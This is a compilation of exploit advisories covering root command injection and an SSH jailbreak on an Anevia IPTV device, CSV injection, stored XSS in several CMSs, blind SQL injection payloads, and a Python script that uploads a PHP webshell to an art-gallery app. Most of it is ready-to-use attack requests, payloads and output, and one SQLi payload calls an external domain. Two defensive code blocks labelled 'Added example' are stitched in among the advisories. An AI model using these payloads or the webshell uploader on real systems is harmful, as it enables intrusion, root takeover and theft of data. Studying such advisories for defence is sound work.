           OpenSSL/0.9.8g
           DAV/2
           PHP/5.3.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5779
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php

13.04.2023

--

```
> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.1.1:80...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
} [32 bytes data]
100    32    0     0  100    32      0     25  0:00:01  0:00:01 --:--:--    25< HTTP/1.1 302 Found
< Date: Thu, 13 Apr 2023 23:54:15 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
* Please rewind output before next send
< Location: /admin/time.php
< Transfer-Encoding: chunked
< Content-Type: text/html
<
* Ignoring the response-body
{ [5 bytes data]
100    32    0     0  100    32      0     19  0:00:01  0:00:01 --:--:--    19
* Connection #0 to host 192.168.1.1 left intact
* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
* Switch from POST to GET
* Found bundle for host: 0x1de6c6321b0 [serially]
* Re-using existing connection #0 with host 192.168.1.1
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
>
< HTTP/1.1 200 OK
< Date: Thu, 13 Apr 2023 23:54:17 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Transfer-Encoding: chunked
< Content-Type: text/html
<
{ [13853 bytes data]
14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br />     <----------------------<<
14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br />     <----------------------<<
100 33896    0 33896    0     0  14891      0 --:--:--  0:00:02 --:--:--   99k
* Connection #0 to host 192.168.1.1 left intact
```
-
Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
                  Hardware revision 1.0
                  SoapLive 2.0.3

Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

Desc: Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows a specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can break out of the restricted environment and have full root access to the device.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix)
           mod_ssl/2.2.15
           OpenSSL/0.9.8g
           DAV/2
           PHP/5.3.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php

13.04.2023

--

```
$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.

Anevia Flamingo XL
[email protected]'s password:
Primary-XL> help
available commands:
bonding config date dns enable ethconfig exit exp firewall help hostname http
igmpq imp ipconfig license log mail passwd persistent_logs ping reboot reset
route serial settings sslconfig tcpdump timezone traceroute upgrade uptime
version vlanconfig
Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
        [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"
Options:
        -F      Set the don't fragment bit
        -I      Use ICMP ECHO instead of UDP datagrams
        -l      Display the ttl value of the returned packet
        -d      Set SO_DEBUG options to socket
        -n      Print hop addresses numerically rather than symbolically
        -r      Bypass the normal routing tables and send directly to a host
        -v      Verbose output
        -m max_ttl      Set the max time-to-live (max number of hops)
        -p port#        Set the base UDP port number used in probes
                        (default is 33434)
        -q nqueries     Set the number of probes per ``ttl'' to nqueries
                        (default is 3)
        -s src_addr     Use the following IP address as the source address
        -t tos          Set the type-of-service in probe packets to the following value
                        (default 0)
        -w wait         Set the time (in seconds) to wait for a response to a probe
                        (default 3 sec)
        -g              Specify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x   19 root     root          1024 Oct  3  2022 .
drwxr-xr-x   19 root     root          1024 Oct  3  2022 ..
drwxr-xr-x    2 root     root          1024 Oct 21  2013 bin
drwxrwxrwt    2 root     root            40 Oct  3  2022 cores
drwxr-xr-x   13 root     root         27648 May 22 00:53 dev
drwxr-xr-x    3 root     root          1024 Oct 21  2013 emul
drwxr-xr-x   48 1000     1000          3072 Oct  3  2022 etc
drwxr-xr-x    3 root     root          1024 Oct  3  2022 home
drwxr-xr-x   11 root     root          3072 Oct 21  2013 lib
lrwxrwxrwx    1 root     root            20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx    1 root     root             3 Oct 21  2013 lib64 -> lib
drwx------    2 root     root         12288 Oct 21  2013 lost+found
drwxr-xr-x    4 root     root          1024 Oct 21  2013 mnt
drwxrwxrwt    2 root     root            80 May 22 00:45 php_sessions
dr-xr-xr-x  177 root     root             0 Oct  3  2022 proc
drwxr-xr-x    4 root     root          1024 Oct 21  2013 root
drwxr-xr-x    2 root     root          2048 Oct 21  2013 sbin
drwxr-xr-x   12 root     root             0 Oct  3  2022 sys
drwxrwxrwt   26 root     root          1140 May 22 01:06 tmp
drwxr-xr-x   10 1000     1000          1024 Oct 21  2013 usr
drwxr-xr-x   14 root     root          1024 Oct 21  2013 var
ls /var/www/admin
_img                 configuration.php                log_securemedia.php  stream_dump.php
_lang                cores_and_logs_management.php    login.php            stream_services
_lib                 dataminer_handshake.php          logout.php           streaming.php
_style               dvbt.php                         logs.php             support.php
about.php            dvbt_scan.php                    main.php             template
ajax                 export.php                       manager.php          time.php
alarm.php            fileprogress.php                 network.php          toto.ts
alarm_view.php       firewall.php                     pear                 upload_helper.php
authentication.php   get_config                       power.php            uptime.php
bridges.php          get_enquiry_pending.php          read_settings.php    usbloader.php
cam.php              get_upgrade_error.php            receive_helper.php   version.php
channel.php          heartbeat.php                    rescrambling         webradio.php
channel_xl_list.php  include                          rescrambling.php     webtv
check_state          input.php                        resilience           webtv.php
class                js                               resilience.php       xmltv.php
common               license.php                      restart_service.php
config_snmp.php      log.php                          set_oem.php
python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x 1 root root 35896 Feb 21  2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding          firewall   mail             timezone
config           help       passwd           traceroute
date             hostname   persistent_logs  upgrade
dbg-serial       http       ping             uptime
dbg-set-oem      igmpq      route            version
dbg-updates-log  imp        serial           vlanconfig
dns              ipconfig   settings
ethconfig        license    sslconfig
exp              log        tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]
```
-
projectSend r1605 - CSV injection
Exploit Title: projectSend r1605 - CSV injection
Version: r1605
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Windows

2. Technical Details & POC
========================================

Step 1. Login as user
Step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
Step 3. Set name as =calc|a!z|
Step 4. If the admin exports the action-log as a CSV file, CSV injection occurs on the admin's computer and the calculator will open ( http://localhost/actions-log.php )

payload: =calc|a!z|
-
projectSend r1605 - Stored XSS
Exploit Title: projectSend r1605 - Stored XSS
Application: projectSend
Version: r1605
Bugs: Stored Xss
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date of found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

1. Login as admin
2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)
3. Go to new JS (http://localhost/custom-assets-add.php?language=js)
4. Set content as alert("xss"); and set public
5. And Save
6. Go to http://localhost (logout)

payload: alert("xss")

```http
POST /custom-assets-add.php HTTP/1.1
Host: localhost
Content-Length: 171
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/custom-assets-add.php?language=js
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l
Connection: close

csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head
```
-
Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested : https://www.softaculous.com/softaculous/demos/Monstra

--- Description ---

1) Login to the admin panel and go to Pages: https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages
2) Click the edit button and write your payload in the Name field:
   Payload: "><script>alert(1)</script>
3) After saving the change you will see the alert button: https://demos3.softaculous.com/Monstraggybvrnbr4/
-
Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-12
# Exploit Author: tmrswrr
# Vendor Homepage: https://xoops.org/
# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10
# Version: 2.5.10
# Tested : https://www.softaculous.com/apps/cms/Xoops

--- Description ---

1) Login to the admin panel and click Image Manager, choose Add Category: https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
2) Write your payload in the Category Name field and submit:
   Payload: <script>alert(1)</script>
3) After clicking multiupload, when you move the mouse to the payload name, you will see the alert button: https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2
-
Online Thesis Archiving System v1.0 - Multiple-SQLi
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The password parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can dump all information from the database of this system, and then he can use it for dangerous and malicious purposes!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:

```mysql
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT (ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)

## Time spent: 01:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
-
Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested : https://release-demo.textpattern.co/

--- Description ---

1) Log in to the admin page, then choose Content, Articles section: https://release-demo.textpattern.co/textpattern/index.php?event=article&ID=2
2) Write this payload in the Excerpt field: "><script>alert(document.cookie)</script>
3) Click My Site and you will see the alert: https://release-demo.textpattern.co/index.php?id=2

--- Request ---

POST /textpattern/index.php HTTP/2
Host: release-demo.textpattern.co
Cookie: txp_login=managing-editor179%2C1673c724813dc43d06d90aff6e69616c; txp_login_public=b7cb169562managing-editor179
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://release-demo.textpattern.co/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------26516646042700398511941284351
Content-Length: 4690
Origin: https://release-demo.textpattern.co
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="ID"

2
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="event"

article
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="step"

edit
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Title"

hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_body"

1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Body"

hello
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="textile_excerpt"

1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Excerpt"

"><script>alert(document.cookie)</script>
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sPosted"

1686684925
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sLastMod"

1686685069
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="AuthorID"

managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="LastModID"

managing-editor179
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Status"

4
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Section"

articles
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="override_form"

article_listing
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="year"

2023
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="month"

06
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="day"

13
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="hour"

19
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="minute"

35
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="second"

25
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_year"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_month"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_day"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_hour"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_minute"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="exp_second"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="sExpires"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category1"

hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Category2"

hope-for-the-future
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="url_title"

alert1
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="description"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Keywords"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="Image"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_1"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="custom_2"

-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="save"

Save
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="app_mode"

async
-----------------------------26516646042700398511941284351
Content-Disposition: form-data; name="_txp_token"

fb6da7f582d0606882462bc4ed72238e
-----------------------------26516646042700398511941284351--
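Added example, not part of the advisory above and not Textpattern's own code: a minimal parser for the multipart/form-data body shown in the request (boundary and field names taken from it; the body itself is an abbreviated, constructed version) that flags fields carrying HTML markup and shows the escaped form a public page should emit for a text field. The markup regex and the set of fields kept are assumptions.

```python
import html
import re

# Boundary copied from the request above; SAMPLE_BODY is a constructed,
# abbreviated body that keeps only the fields relevant to the finding.
BOUNDARY = "---------------------------26516646042700398511941284351"
SAMPLE_BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="Title"\r\n\r\nhello\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="Excerpt"\r\n\r\n'
    '"><script>alert(document.cookie)</script>\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="url_title"\r\n\r\nalert1\r\n'
    f'--{BOUNDARY}--\r\n'
)

NAME_RE = re.compile(r'name="([^"]+)"')
# Markup that has no business in a plain-text excerpt: tag openers, inline
# event handlers, javascript: URLs (assumed indicator set).
MARKUP_RE = re.compile(r"<\s*/?\s*[a-zA-Z]|\bon[a-z]+\s*=|javascript:", re.IGNORECASE)


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value}."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":          # leading empty chunk / closing "--"
            continue
        head, _, value = part.partition("\r\n\r\n")
        match = NAME_RE.search(head)
        if match:
            fields[match.group(1)] = value
    return fields


def flag_markup(fields: dict) -> list:
    """Names of fields whose value carries markup (stored-XSS candidates)."""
    return [name for name, value in fields.items() if MARKUP_RE.search(value)]


def safe_render(fields: dict, name: str) -> str:
    """What the public page should emit for a text field: HTML-escaped,
    including quotes, so the value cannot break out of its context."""
    return html.escape(fields.get(name, ""), quote=True)
```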
-
Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
# Exploit Title: Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)
# Google Dork: n/a
# Date: 14/06/2023
# Exploit Author: Ramil Mustafayev
# Vendor Homepage: https://github.com/projectworldsofficial
# Software Link: https://github.com/projectworlds32/Art-Gallary-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a

# Vulnerability Description:
#
# Online Art Gallery Project 1.0 allows unauthenticated users to perform arbitrary file uploads via the adminHome.php page. Due to the absence of an authentication mechanism and inadequate file validation, attackers can upload malicious files, potentially leading to remote code execution and unauthorized access to the server.

# Usage: python exploit.py http://example.com

import requests
import sys


def upload_file(url, filename, file_content):
    # The file goes in the "sliderpic" field that Admin/adminHome.php accepts
    # without a session check or content validation.
    files = {
        'sliderpic': (filename, file_content, 'application/octet-stream')
    }
    data = {
        'img_id': '',
        'sliderPicSubmit': ''
    }
    url = url + "/Admin/adminHome.php"
    try:
        requests.post(url, files=files, data=data)
    except requests.RequestException:
        # Network or HTTP-level failure: stop instead of reporting success below.
        print("[!] Exploit failed!")
        sys.exit(1)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python exploit.py <target_url>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = "simple-backdoor.php"
    file_content = '<?php system($_GET["c"]);?>'

    upload_file(target_url, file_name, file_content)
    print("[+] The simple-backdoor has been uploaded.\n Check following URL: " + target_url + "/images/Slider" + file_name + "?c=whoami")
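Added example (not the project's code and not the author's): the checks the upload handler described above lacks, in one place: an authenticated admin session, an extension allowlist for slider images, a magic-byte check against the declared type, a refusal of embedded PHP tags, and a server-chosen filename. The field name sliderpic comes from the PoC; the session dict shape, the allowed types and the PHP-tag check are assumptions.

```python
import secrets
from dataclasses import dataclass

# Image types a slider picture may legitimately be (assumed allowlist), keyed
# by extension, with the leading bytes each one must start with.
ALLOWED_IMAGE_MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}


@dataclass
class Upload:
    field: str       # form field the file arrived in (the PoC uses "sliderpic")
    filename: str    # client-supplied name; never trusted for the stored path
    content: bytes


def validate_slider_upload(upload: Upload, session: dict) -> tuple:
    """Return (accepted, reason). Each check is one the vulnerable handler skipped."""
    if not session.get("admin_authenticated"):       # assumed session flag
        return False, "authentication required"
    if upload.field != "sliderpic":
        return False, "unexpected form field"
    ext = upload.filename.rsplit(".", 1)[-1].lower() if "." in upload.filename else ""
    if ext not in ALLOWED_IMAGE_MAGIC:
        return False, f"extension '{ext}' not allowed"
    if not any(upload.content.startswith(m) for m in ALLOWED_IMAGE_MAGIC[ext]):
        return False, "content does not match declared image type"
    # A valid image header with PHP appended (polyglot) still fails here.
    if b"<?php" in upload.content or b"<?=" in upload.content:
        return False, "embedded PHP tag"
    return True, "ok"


def stored_name(upload: Upload) -> str:
    """Server-chosen name: random token plus the validated extension, so the
    client can neither steer the stored path nor pick an executable extension."""
    ext = upload.filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"
```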
-
The Shop v2.5 - SQL Injection
# Exploit Title: The Shop v2.5 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/the-shop/34858541
# Demo Site: https://shop.activeitzone.com
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /api/v1/carts/add HTTP/1.1
Content-Type: application/json
Accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
Referer: https://localhost
Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL; the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
Content-Length: 81
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}

### Parameter & Payloads ###

Parameter: JSON qty ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420) THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495) END))","temp_user_id":null}

    Type: time-based blind
    Title: MySQL > 5.0.12 OR time-based blind (heavy query)
    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR 2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)","temp_user_id":null}
-
Groomify v1.0 - SQL Injection
# Exploit Title: Groomify v1.0 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114#
# Demo Site: https://script.bugfinder.net/groomify
# Tested on: Kali Linux
# CVE: N/A

### Vulnerable URL ###

https://localhost/groomify/blog-search?search=payload

### Parameter & Payloads ###

Parameter: search (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=deneme' AND (SELECT 1642 FROM (SELECT(SLEEP(5)))Xppf) AND 'rszk'='rszk